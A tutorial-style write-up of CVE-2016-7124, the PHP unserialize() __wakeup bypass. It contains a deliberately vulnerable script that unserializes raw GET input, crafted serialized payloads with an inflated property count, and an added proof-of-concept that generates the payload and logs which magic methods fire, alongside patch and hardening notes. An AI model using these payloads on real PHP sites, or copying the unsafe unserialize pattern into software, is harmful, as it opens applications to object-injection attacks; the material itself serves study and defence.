【CVE-2016-7124】 PHP unserialize() __wakeup bypass

This article was last updated: August 28, 2021, 6:40 PM

CVE-2016-7124

Vulnerability principle

When the property count declared in the serialized object header (the N in O:4:"User":N:{...}) is larger than the number of properties actually present in the string, unserialize() fails partway through and __wakeup is never called. By that point the object has already been instantiated and its properties populated, so on vulnerable versions its __destruct still runs when the partially built object is released. That is what the CVE covers: crafted serialized data that reaches __destruct (or another magic method) without __wakeup ever having run.

Affected versions

PHP 5 < 5.6.25
PHP 7 < 7.0.10

__wakeup bypass on PHP 5.5.9

Suppose we have the following code:

    <?php
    class User {
        public $username;
        public $password;

        // Runs after unserialize() has rebuilt the object
        function __wakeup() {
            die("123");
        }
        // Runs when the object is released
        function __destruct() {
            die("456");
        }
    }

    $a = $_GET['a'];
    $a_unseri = unserialize($a);   // untrusted input passed straight to unserialize()
    var_dump($a_unseri);
    ?>

Construct the object:

    <?php
    class User {
        public $username = "Lxxx";
        public $password = "lxxx";
    }
    $a = new User();
    echo urlencode(serialize($a));   // URL-encoded form for use as a GET parameter
    echo "\n";
    echo serialize($a);
    ?>

Output:

O%3A4%3A%22User%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D
O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}

Pass the URL-encoded string to the script as GET parameter a in the browser:

O%3A4%3A%22User%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D

The result is:

(screenshot: __wakeup runs and the script dies with "123")

But if we raise the declared property count so that it exceeds the real one (here from 2 to 3):

O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
O:4:"User":3:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}

That is, pass:

O%3A4%3A%22User%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D

The result is:

(screenshot: __wakeup is skipped; unserialize() fails, and __destruct still fires, so the script dies with "456")

So the __wakeup magic method has been bypassed: unserialize() returns false because of the count mismatch, but the User object was created and populated before the mismatch was detected, and its __destruct still runs. Any sanitisation or reset the class performs in __wakeup therefore never happens, while a gadget sitting in __destruct still fires. From PHP 5.6.25 / 7.0.10 onward a failed unserialize() of an object that defines __wakeup no longer invokes __destruct, which closes this bypass; the general defence remains not to pass untrusted input to unserialize() at all (or, on PHP 7+, to restrict it with allowed_classes).
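As an added example (not code from the original post), the following script builds the payload from the principle and walkthrough above programmatically and records which magic methods actually run, instead of using die(). The helper names bump_property_count() and run() are mine, the regex assumes a top-level object payload, and the allowed_classes hardening branch assumes PHP 7.0 or later. Run it on a vulnerable build (e.g. PHP 5.5.9) and on a patched one to compare.

```php
<?php
// Added example, not code from the original post: constructs the
// CVE-2016-7124 payload and logs which magic methods fire for it.

$calls = array();   // constructed log of magic-method calls

class User {
    public $username;
    public $password;

    function __wakeup() {
        global $calls;
        $calls[] = '__wakeup';
    }
    function __destruct() {
        global $calls;
        $calls[] = '__destruct';
    }
}

// Rewrite the declared property count of the outermost object in a
// serialized string. Only the O:<len>:"<class>":<count>:{ header is touched;
// the property list that follows is left exactly as serialize() produced it.
function bump_property_count($serialized, $delta) {
    return preg_replace_callback(
        '/^(O:\d+:"[^"]+":)(\d+)(:\{)/',
        function ($m) use ($delta) {
            return $m[1] . ((int)$m[2] + $delta) . $m[3];
        },
        $serialized
    );
}

// Unserialize $payload and report which magic methods ran and what
// unserialize() returned. Notices ("Error at offset ...") are muted.
// $options (allowed_classes) is only honoured on PHP >= 7.0.
function run($payload, $options = null) {
    global $calls;
    $calls = array();
    $result = ($options === null)
        ? @unserialize($payload)
        : @unserialize($payload, $options);
    $summary = is_object($result) ? get_class($result) : var_export($result, true);
    unset($result);   // release the object so a pending __destruct fires here
    return array('calls' => $calls, 'result' => $summary);
}

$benign = serialize(new User());            // O:4:"User":2:{...}
$evil   = bump_property_count($benign, 1);  // header now claims 3, only 2 present

foreach (array('benign' => $benign, 'evil' => $evil) as $name => $payload) {
    $r = run($payload);
    printf("%-6s %s\n       calls: %s, result: %s\n",
        $name, $payload,
        $r['calls'] ? implode(', ', $r['calls']) : 'none',
        $r['result']);
}

// Hardening available on PHP >= 7.0: refuse to instantiate any class.
// The object becomes __PHP_Incomplete_Class, so neither magic method can run.
if (PHP_VERSION_ID >= 70000) {
    $r = run($evil, array('allowed_classes' => false));
    printf("evil with allowed_classes=false: calls: %s, result: %s\n",
        $r['calls'] ? implode(', ', $r['calls']) : 'none', $r['result']);
}
```

On a vulnerable build the benign payload logs __wakeup followed by __destruct and yields a User, while the evil payload logs only __destruct and yields false, which is the bypass. On a patched build the evil payload logs nothing at all, and with allowed_classes=false no class is instantiated regardless of the count.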